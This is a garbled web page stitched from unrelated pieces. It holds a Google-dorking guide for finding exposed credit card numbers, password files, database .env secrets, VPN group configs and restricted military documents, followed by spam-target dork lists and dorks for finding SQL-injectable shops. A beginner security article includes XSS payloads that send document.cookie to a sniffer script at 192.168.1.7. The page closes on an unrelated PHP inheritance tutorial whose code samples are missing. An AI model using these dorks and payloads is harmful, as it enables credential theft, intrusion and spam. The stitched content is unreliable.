Inurl odna stat php id multiverb. PHP: Inheritance

Obtaining private data does not always mean hacking - sometimes it is published publicly. Knowledge of Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Today, everything is connected to the Internet, with little concern for restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Internet and constantly add non-public information to their databases. Finding out these secrets is easy - you just need to know how to ask about them.

Looking for files

In capable hands, Google will quickly find everything that is not found on the Internet, for example, personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data simply lies on the back of the site, where no links lead. The standard Google web interface provides only basic advanced search settings, but even these will be sufficient.

You can limit your Google search to a specific type of file using two operators: filetype and ext . The first specifies the format that the search engine determined from the file title, the second specifies the file extension, regardless of its internal content. When searching in both cases, you only need to specify the extension. Initially, the ext operator was convenient to use in cases where the file did not have specific format characteristics (for example, to search for ini and cfg configuration files, which could contain anything). Now Google's algorithms have changed, and there is no visible difference between operators - in most cases the results are the same.


Filtering the results

By default, Google searches for words and, in general, any entered characters in all files on indexed pages. You can limit the search area by top-level domain, a specific site, or by the location of the search sequence in the files themselves. For the first two options, use the site operator, followed by the name of the domain or selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the given one in the body of the links themselves, allinanchor - in the text equipped with the tag , allintitle - in page titles, allintext - in the body of pages.

For each operator there is a lightweight version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, and inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another operator with a similar meaning - site. The first also allows you to find any sequence of characters in a link to the searched document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the request produce a list of numbers and verification codes of credit cards that will expire only in two years (or when their owners get tired of feeding everyone).

Allintext: card number expiration date /2017 cvv

When you read in the news that a young hacker “hacked into the servers” of the Pentagon or NASA, stealing classified information, in most cases we are talking about just such a basic technique of using Google. Suppose we are interested in a list of NASA employees and their contact information. Surely such a list is available in electronic form. For convenience or due to oversight, it may also be on the organization’s website itself. It is logical that in this case there will be no links to it, since it is intended for internal use. What words can be in such a file? At a minimum - the “address” field. Testing all these assumptions is easy.


Inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Finds like this are a nice touch. A truly solid catch is provided by a more detailed knowledge of Google's operators for webmasters, the Network itself, and the peculiarities of the structure of what is being sought. Knowing the details, you can easily filter the results and refine the properties of the necessary files in order to get truly valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces standard formulations that are convenient for searching for secret information accidentally leaked onto the Internet.

For example, the Distribution statement stamp, required by the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A denotes public releases in which there is nothing secret; B - intended only for internal use, C - strictly confidential, and so on until F. The letter X stands out separately, which marks particularly valuable information representing a state secret of the highest level. Let those who are supposed to do this on duty search for such documents, and we will limit ourselves to files with the letter C. According to DoDI directive 5230.24, this marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully protected information on sites in the top-level domain.mil, allocated for the US Army.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that the .mil domain contains only sites from the US Department of Defense and its contract organizations. Search results with a domain restriction are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets in this way is practically useless: chaos reigns in domains.ru and.rf, and the names of many weapons systems sound like botanical ones (PP “Kiparis”, self-propelled guns “Akatsia”) or even fabulous (TOS “Buratino”).


By carefully studying any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions “Sec 2751”, which is also convenient for searching for interesting technical information. From time to time it is removed from official sites where it once appeared, so if you cannot follow an interesting link in the search results, use Google’s cache (cache operator) or the Internet Archive site.

Climbing into the clouds

In addition to accidentally declassified government documents, links to personal files from Dropbox and other data storage services that create “private” links to publicly published data occasionally pop up in Google's cache. It’s even worse with alternative and homemade services. For example, the following query finds data for all Verizon customers who have an FTP server installed and actively using their router.

Allinurl:ftp://verizon.net

There are now more than forty thousand such smart people, and in the spring of 2015 there were many more of them. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external storage device connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file downloading. All contents of such media are indexed by Google and other search engines, so you can access files stored on external drives via a direct link.

Looking at the configs

Before the widespread migration to the cloud, simple FTP servers ruled as remote storage, which also had a lot of vulnerabilities. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the ws_ftp.ini file. It is easy to find and read, since all records are saved in text format, and passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

It is easy to decrypt such passwords using the WS_FTP Password Decryptor utility or a free web service.

When talking about hacking an arbitrary website, they usually mean obtaining a password from logs and backups of configuration files of CMS or e-commerce applications. If you know their typical structure, you can easily indicate the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, in Drupal and PrestaShop there is always a user identifier (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them as follows:

"pwd=" "UID=" ext:inc

Revealing DBMS passwords

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and their MD5 hashes are written instead of passwords. Strictly speaking, it is impossible to decrypt them, but you can find a match among the known hash-password pairs.

There are still DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.

Intext:DB_PASSWORD filetype:env

With the advent of Windows servers, the place of configuration files was partially taken by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

Filetype:reg HKEY_CURRENT_USER "Password"=

Let's not forget the obvious

Sometimes it is possible to get to classified information using data that was accidentally opened and came to the attention of Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, Word document or Excel spreadsheet, but there is always enough of them.

Filetype:xls inurl:password

On the one hand, there are a lot of means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch the CMS, not use left-handed scripts and close other holes. There is also a file with a list of robots.txt exceptions that prohibits search engines from indexing the files and directories specified in it. On the other hand, if the structure of robots.txt on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.

The list of directories and files on any site is preceded by the standard index of. Since for service purposes it must appear in the title, it makes sense to limit its search to the intitle operator. Interesting things are in the /admin/, /personal/, /etc/ and even /secret/ directories.

Stay tuned for updates

Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between a “last second” filter (&tbs=qdr:s at the end of the request URL) and a “real time” filter (&tbs=qdr:1).

The time interval of the date of the last update of the file is also indicated implicitly by Google. Through the graphical web interface, you can select one of the standard periods (hour, day, week, etc.) or set a date range, but this method is not suitable for automation.

From the look of the address bar, you can only guess about a way to limit the output of results using the &tbs=qdr: construction. The letter y after it sets the limit of one year (&tbs=qdr:y), m shows the results for the last month, w - for the week, d - for the past day, h - for the last hour, n - for the minute, and s - for give me a sec. The most recent results that Google has just made known are found using the filter &tbs=qdr:1 .

If you need to write a clever script, it will be useful to know that the date range is set in Google in Julian format using the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential, downloaded from January 1 to July 1, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is indicated in Julian date format without taking into account the fractional part. Translating them manually from the Gregorian calendar is inconvenient. It's easier to use a date converter.

Targeting and filtering again

In addition to specifying additional operators in the search query, they can be sent directly in the body of the link. For example, the filetype:pdf specification corresponds to the construction as_filetype=pdf . This makes it convenient to ask any clarifications. Let's say that the output of results only from the Republic of Honduras is specified by adding the construction cr=countryHN to the search URL, and only from the city of Bobruisk - gcs=Bobruisk. You can find a complete list in the developer section.

Google's automation tools are designed to make life easier, but they often add problems. For example, a user’s IP is used to determine their city via WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same request, different results will appear on the first page, and some of them may be completely hidden. The two-letter code after the gl=country directive will help you feel like a cosmopolitan and search for information from any country. For example, the code of the Netherlands is NL, but the Vatican and North Korea do not have their own code in Google.

Often, search results end up cluttered even after using several advanced filters. In this case, it is easy to clarify the request by adding several exception words to it (a minus sign is placed in front of each of them). For example, banking, names and tutorial are often used with the word Personal. Therefore, cleaner search results will be shown not by a textbook example of a query, but by a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

One last example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, VPN is a convenient thing, but either expensive, or temporary and with restrictions. Signing up for a subscription for yourself is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request and you join, for example, the friendly team of the University of Bonn.

Filetype:pcf vpn OR Group

INFO Google finds configuration files with passwords, but many of them are written in encrypted form or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

Passwords are stored encrypted, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.

Google runs hundreds of different types of attacks and penetration tests. There are many options, affecting popular programs, major database formats, numerous vulnerabilities of PHP, clouds, and so on. Knowing exactly what you're looking for will make it much easier to find the information you need (especially information you didn't intend to make public). Shodan is not the only one that feeds with interesting ideas, but every database of indexed network resources!

How to search correctly using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you correctly compose a search query using special constructions, you can achieve the results of what you are looking for much more efficiently and quickly =) In this article I will try to show that and what you need to do to search correctly

Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these statements change the search, or even tell Google to do completely different types of searches. For example, the link: construct is a special operator, and the request link:www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
alternative request types

cache: If you include other words in a query, Google will highlight those included words within the cached document.
For example, cache:www.web site will show the cached content with the word "web" highlighted.

link: The search query above will show web pages that contain links to the specified query.
For example: link:www.site will display all pages that have a link to http://www.site

related: Displays web pages that are “related” to the specified web page.
For example, related: www.google.com will list web pages that are similar to Google's home page.

info: Request Information: will present some information that Google has about the web page you are requesting.
For example, info:website will show information about our forum =) (Armada - Adult Webmasters Forum).

Other information requests

define: The define: query will provide a definition of the words you enter after it, collected from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks: Google will process the rest of the query terms as stock symbols, and link to a page showing ready-made information for these symbols.
For example, stocks:Intel yahoo will show information about Intel and Yahoo. (Note that you should type breaking news symbols, not the company name)

Query Modifiers

site: If you include site: in your query, Google will limit the results to those websites it finds in that domain.
You can also search by individual zones, such as ru, org, com, etc ( site:com site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results to all query words in the title.
For example, allintitle: google search will return all Google pages by search such as images, Blog, etc

intitle: If you include intitle: in your query, Google will limit the results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl: Google will limit the results to all query words in the URL.
For example, allinurl: google search will return documents with google and search in the title. Also, as an option, you can separate words with a slash (/) then words on both sides of the slash will be searched within the same page: Example allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:site

intext: searches only the specified word in the page text, ignoring the title and link texts, and other things not related to. There is also a derivative of this modifier - allintext: i.e. further, all words in the query will be searched only in the text, which can also be important, ignoring frequently used words in links
For example, intext:forum

daterange: searches within a time frame (daterange:2452389-2452389), dates for times are in Julian format.

Well, and all sorts of interesting examples of queries

Examples of writing queries for Google. For spammers

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp “Character Count”

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Magazines

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Guest book"

Blogs

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Forums

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

It becomes funny every time when people start talking about private dorks.
Let's start by defining what a dork is and what a private is:

DORK (DORKA) - this is a mask, in other words, a request to a search engine, in response to which the system will produce a list of website pages whose addresses contain this same DORK.

Private - information to which only one person or a small group of people working on one project has access.

Now let's look at the phrase " Private sex ".
If we send a request to find sites for a given domain and it gives us some kind of result, then anyone can do this, and therefore the information provided is not private.

And a little about game/money/shop sellers.
A lot of people like to make dorks of this type:

Steam.php?q= bitcoin.php?id= minecraft.php?id=

Let’s imagine that we don’t understand anything about dorks and try to see how many links Google gives us:

You probably immediately had thoughts like this in your head: “Khrenovich, you don’t know shit, look at how many links there are, people are practically selling money!”
But I’ll tell you no, because now let’s see what links such a request will give us:


I think you get the point, now let's use the Google operator inurl: for an exact search and let's see what comes up:


Yeah, the number has decreased sharply, then the same thing. And if we take into account that there will be duplicate domains + links of the ***.info/vaernamo-nyheter/dennis-steam.php plan, then the bottom line is that we get 5-10 pieces.

How many people do you think will add such links to their website?

You must be registered to see links.

", etc., yes of course only a few.

Which means writing dorks like steam.php?id= there is no point, then the question is, what kind of dorki should we cook?
And everything is quite simple, we need to collect as many links as possible on our door. The largest number of links will come from the most primitive link of the form index.php?id=


Oops, as much as 538 million, a good result, right?
Let's add more inurl:


Well, half of them have disappeared, but now almost all links will have index.php?id=

From the above we can conclude: we need the most frequently used directories, it is from them that our results will be the highest.

I think many people had thoughts like: “Well, what next? We need thematic sites, and not all sorts of sites for puppy lovers!” Well, of course, but to move on to the topics of the sites, we will need to get acquainted with Google operators, let's get started. We will not analyze all operators, but only those that will help us with page parsing.

What are the operators we are interested in:

inurl: Shows sites that contain the specified word in the page address.
Example:
We need sites where the page address contains the word cart. Let's create a request like inurl:cart and it will give us all the links where the address contains the word cart. Those. Using this request, we achieved more strict compliance with our conditions and the elimination of links that do not suit us.

intext: pages are selected based on the content of the page.
Example:
Let's say we need pages on which the words bitcoin are written. Let's create a request like intext:bitcoin Now it will give us links where the word bitcoin was used in the text.

intitle: pages are displayed that have the words specified in the query in the title tag. I think you already understand how to write queries, so I won’t give examples.

allinanchor: the operator shows pages that have words of interest to us in their description.

related: perhaps one of the important operators that provides sites with similar content.
Example:
related:exmo.com - it will give us exchanges, try checking it yourself.

Well, perhaps all the main operators that we need.

Now let's move on to building roads using these operators.

Before each door we will put an inurl:

Inurl:cart?id= inurl:index?id= inurl:catalog?id=


Let's also use intext: let's say we're looking for toys, which means we need words like dota2, portal, CSGO...

Intext:dota2 intext:portal intext:csgo

If we need a phrase, then allinurl:

Allinurl:GTA SAMP...

Now let’s glue it all together and get this look:

Inurl:cart?id= intext:dota2 inurl:cart?id= intext:portal inurl:cart?id= intext:csgo inurl:cart?id= allinurl:GTA SAMP inurl:index?id= intext:dota2 inurl:index? id= intext:portal inurl:index?id= intext:csgo inurl:index?id= allinurl:GTA SAMP inurl:catalog?id= intext:dota2 inurl:catalog?id= intext:portal inurl:catalog?id= intext: csgo inurl:catalog?id= allinurl:GTA SAMP

As a result, we got game doors with a narrower and more precise search.
So use your brains and experiment a little with search operators and keywords, no need to get perverted and write dorks like hochymnogoigr.php?id=

Thank you all, I hope you got at least something useful from this article.

I decided to talk a little about information security. The article will be useful for novice programmers and those who have just begun to engage in Frontend development. What is the problem?

Many novice developers get so carried away with writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL and XXS queries. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can you avoid them?

SQL injection

SQL injection is the most common type of attack on a database, which is carried out during an SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer error when writing the database and, strictly speaking, SQL queries.

A SQL injection attack is possible due to incorrect processing of the input data used in SQL queries. If a hacker's attack is successful, you risk losing not only the contents of your databases, but also your passwords and administrative panel logs. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on what DBMS is used and how the script itself is implemented. There are many vulnerable sites for SQL injections in the world. This is easy to verify. Just enter “dorks” - these are special queries for searching for vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How to use them? Just enter them into a Google or Yandex search engine. The search engine will give you not just a vulnerable site, but also a page about this vulnerability. But we won’t stop there and make sure that the page is really vulnerable. To do this, it is enough to put a single quote “‘ after the value “id=1”. Something like this:

  • inurl:games.php?id=1’

And the site will give us an error about the SQL query. What does our hacker need next?

And then he needs this very link to the error page. Then work on the vulnerability in most cases takes place in the "Kali linux" distribution with its utilities for this part: introducing injection code and performing the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

XSS Attack

This type of attack is carried out on Cookies files. Users, in turn, love to save them. Why not? What would we do without them? After all, thanks to Cookies, we don’t have to enter the password for Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To implement an XSS attack, our hacker needs knowledge of JavaScript. At first glance, the language is very simple and harmless, because it does not have access to computer resources. A hacker can only work with JavaScript in a browser, but that’s enough. After all, the main thing is to enter the code into the web page.

I will not talk in detail about the attack process. I will only tell you the basics and meaning of how this happens.

A hacker can add JS code to some forum or guest book:

document.location.href =”http://192.168.1.7/sniff.php?test”

The scripts will redirect us to the infected page, where the code will be executed: be it a sniffer, some kind of storage or an exploit, which will somehow steal our Cookies from the cache.

Why JavaScript? Because JavaScript is great at handling web requests and has access to Cookies. But if our script takes us to some site, the user will easily notice it. Here the hacker uses a more cunning option - he simply enters the code into the picture.

Img=new Image();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? It’s very simple - do not click on suspicious links.

DoS and DDos Attacks

DoS (from the English Denial of Service - denial of service) is a hacker attack on a computer system with the goal of causing it to fail. This is the creation of conditions under which bona fide system users cannot access the provided system resources (servers), or this access is difficult. A system failure can also be a step towards its takeover if, in an emergency situation, the software produces any critical information: for example, a version, part of a program code, etc. But most often this is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid an attack significantly hit the “target” in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow almost any system to fail without leaving legally significant evidence.

What is the difference between DoS and DDos attack?

DoS is an attack designed in a clever way. For example, if the server does not check the correctness of incoming packets, then a hacker can make a request that will take forever to process, and there will not be enough processor time to work with other connections. Accordingly, clients will be denied service. But it will not be possible to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can cope with such overload without any problems.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there can be hundreds or more of them. Even super-powerful servers may not be able to cope with such an overload. Let me give you an example.

A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts shouting loudly. It is either impossible or very difficult to talk. Solution: call security, who will calm down and remove the person from the premises. DDoS attacks are when a crowd of thousands of such ill-mannered people rushes in. In this case, the security will not be able to tie everyone up and take them away.

DoS and DDoS are carried out from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is participating in an attack on any server.

How to protect yourself from this? In general, no way. But you can make things more difficult for a hacker. To do this, you need to choose a good hosting with powerful servers.

Bruteforce attack

A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when he gets to the last step of website layout, namely when he simply puts a password on the admin panel, he may forget about one thing. Password!

It is strictly not recommended to set a simple password. This could be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and uncomplicated attack - Brute force.

Brute force is a dictionary password search attack using special programs. Dictionaries can be different: Latin, enumeration by numbers, say, up to a certain range, mixed (Latin + numbers), and there are even dictionaries with unique characters @#4$%&*~~`’”\ ? etc.

Of course, this type of attack is easy to avoid. Just come up with a complex password. Even a captcha can save you. Also, if your site is made on a CMS, then many of them detect this type of attack and block the IP. You must always remember that the more different characters in a password, the more difficult it is to guess.

How do Hackers work? In most cases, they either suspect or know part of the password in advance. It is quite logical to assume that the user’s password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacking. Basically, hackers take a range of 5 to 10 characters and add several characters that they may know in advance. Next, passwords with the required ranges are generated. The Kali Linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, and the search speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But it’s not just websites that are subject to brute force.

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always get distracted somewhere or miss something. We are programmers, but not programmed machines. Always be on guard, because losing information can have serious consequences!

Inheritance is an object-oriented programming mechanism that allows you to describe a new class based on an existing one (parent).

A class that is obtained by inheriting from another is called a subclass. This relationship is usually described using the terms "parent" and "child". A child class is derived from the parent and inherits its characteristics: properties and methods. Typically, a subclass adds new functionality to the functionality of the parent class (also called a superclass).

To create a subclass, you must use the extends keyword in the class declaration, followed by the name of the class from which you are inheriting:

The subclass inherits access to all methods and properties of the parent class, since they are of type public . This means that for instances of the my_Cat class, we can call the add_age() method and access the $age property, even though they are defined in the cat class. Also in the example above, the subclass does not have its own constructor. If the subclass does not declare its own constructor, then when creating instances of the subclass, the superclass constructor will be automatically called.

Please note that subclasses can override properties and methods. By defining a subclass, we ensure that its instance is defined by the characteristics of first the child and then the parent class. To understand this better, consider an example:

When calling $kitty->foo(), the PHP interpreter cannot find such a method in the my_Cat class, so the implementation of this method defined in the Cat class is used. However, the subclass defines its own $age property, so when it is accessed in the $kitty->foo() method, the PHP interpreter finds that property in the my_Cat class and uses it.

Since we have already covered the topic of specifying the type of arguments, it remains to say that if the parent class is specified as the type, then all descendants for the method will also be available for use, look at the following example:

We can treat an instance of the my_Cat class as if it were an object of type Cat, i.e. we can pass an object of type my_Cat to the foo() method of the Cat class, and everything will work as expected.

parent operator

In practice, subclasses may need to extend the functionality of parent class methods. By extending functionality by overriding superclass methods, subclasses retain the ability to first execute the parent class's code and then add code that implements the additional functionality. Let's look at how this can be done.

To call the desired method from a parent class, you will need to access this class itself through a descriptor. PHP provides the parent keyword for this purpose. The parent operator allows subclasses to access the methods (and constructors) of the parent class and add to their existing functionality. To refer to a method in the context of a class, use the symbols "::" (two colons). The parent operator syntax is:

Parent::parent_class method

This construct will call a method defined in the superclass. Following this call, you can place your own program code that will add new functionality:

When a child class defines its own constructor, PHP does not automatically call the parent class's constructor. This must be done manually in the subclass constructor. The subclass first calls the constructor of its parent class in its constructor, passing the necessary arguments for initialization, executes it, and then executes the code that implements additional functionality, in this case initializing a property of the subclass.

The parent keyword can be used not only in constructors, but also in any other method whose functionality you want to extend, this can be achieved by calling a method of the parent class:

Here, the getstr() method from the superclass is first called, the value of which is assigned to a variable, and after that the rest of the code defined in the subclass method is executed.

Now that we've covered the basics of inheritance, we can finally look at the issue of visibility of properties and methods.

public, protected and private: access control

Up to this point, we have explicitly declared all properties as public. And this type of access is set by default for all methods.

Members of a class can be declared as public, protected, or private. Let's look at the difference between them:

  • Public properties and methods can be accessed from any context.
  • Protected properties and methods can be accessed either from the containing class or from its subclass. No external code is allowed access to them.
  • You can make class data inaccessible to the calling program by using the private keyword. Such properties and methods can only be accessed from the class in which they are declared. Even subclasses of this class do not have access to such data.
public - open access: private - access only from class methods: protected - protected access:

The protected modifier, from the point of view of the calling program, looks exactly the same as private: it prohibits access to the object's data from the outside. However, unlike private, it allows you to access data not only from methods of your class, but also from methods of a subclass.



Related publications